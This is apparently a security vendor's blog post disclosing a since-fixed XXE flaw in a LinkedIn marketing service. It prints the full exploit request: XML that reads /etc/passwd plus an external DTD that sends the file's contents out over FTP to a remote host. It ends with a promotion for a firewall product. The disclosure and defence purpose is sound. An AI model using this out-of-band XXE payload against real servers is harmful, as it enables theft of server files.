With all the time and resources we allocate to finding application vulnerabilities it’s easy to forget that 3rd party libraries and software can introduce vulnerabilities into our applications as well. Hackers know this and they try to exploit them.
In this blog post we will illustrate a vulnerability found within one of the LinkedIn services. The security issue was discovered in December 2015 and was fixed within 24 hours by the LinkedIn team.
What is XXE
OWASP says, An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
So XXE vulnerability is not truly a developer mistake but more of a misconfiguration of the XME parser.
The impact of XXE vulnerabilities are severe. They allow the ability to read local files on remote servers, run queries into internal networks, and in some cases even execute code remotely.
XXE in an application server
An even more complicated situation is where a vulnerability is not introduced in your code, but in the web server or application server you use.
A good example here is an old vulnerability in SOAP server Apache CXF. Unsafe initialization was introduced in Apache CXF library, and the developer was unable to catch how the XML parser initialized. As a quick bug fix, Apache CXF maintainers propose developers to redefine the XML parser in a safe way by themselves. In the case it was possible — but what if you have such a vulnerability in the code of web server?
This is exactly the case with the critical LinkedIn service vulnerability discovered by Wallarm security researcher, Anton Lopanitsyn.
Vulnerability in LinkedIn
LinkedIn Marketing Solutions is a B2B product for the marketing purposes within a social network. After a simple check, it turned out that web server parses all of the XML documents passed within HTTPS requests. Parsing happens even before passing a control flow to the web application itself. So it was the functionality of the application server.
As a result, it was possible to send XML documents to any web server URL which could result in the XXE vulnerability being exploited. This is an example of a request to the root page which allowed the reading of the local file /etc/motd
POST / HTTP/1.1 Content-type: blabla/xml Host: signin.lms.linkedin.com Content-Length: 204 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Wallarm-bot Accept: */*
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY % b SYSTEM "file:///etc/passwd"> <!ENTITY % asd SYSTEM "http://wallarm.tools/xxe.dtd"> %asd; %rrr; ]> <a>123</a>
The content of xxe.dtd:
<!ENTITY % c ‘<!ENTITY % rrr SYSTEM “ftp://email@example.com:8021/%b;">'>%c;
In the XML file, a special OOB technique was used for reading the file content and transmitting it to the FTP server. You can get more details on this technique in this article.
Wallarm reported this vulnerability to the LinkedIn Security Team on December 12th and received an initial response within two minutes. The vulnerability was fixed within a 24-hour turnaround.
Protection against XXE
Obviously, organizations are not able to do a lot if a vulnerability occurs in 3rd party libraries or application server. In this case, you need to use WAFs (Web Application Firewall) which analyze all the HTTP request and block those which malicious payloads.
However, there is one complication….a WAF needs to have full support for parsing XML documents to provide an actual protection against XXE vulnerabilities. It may seem that an organization just requires a few regular expressions to analyze requests. However, XML documents could be transmitted in a different encoding, e.g. in UTF-16, andattempts to mitigate via expressions will fail.
Wallarm parses all the XML content to detect XXE attacks. Furthermore, Wallarm can discover XXE vulnerabilities with a built-in fuzzer. You can try it now for free at https://wallarm.com.
PS Be aware that LinkedIn does not have a public bug bounty program!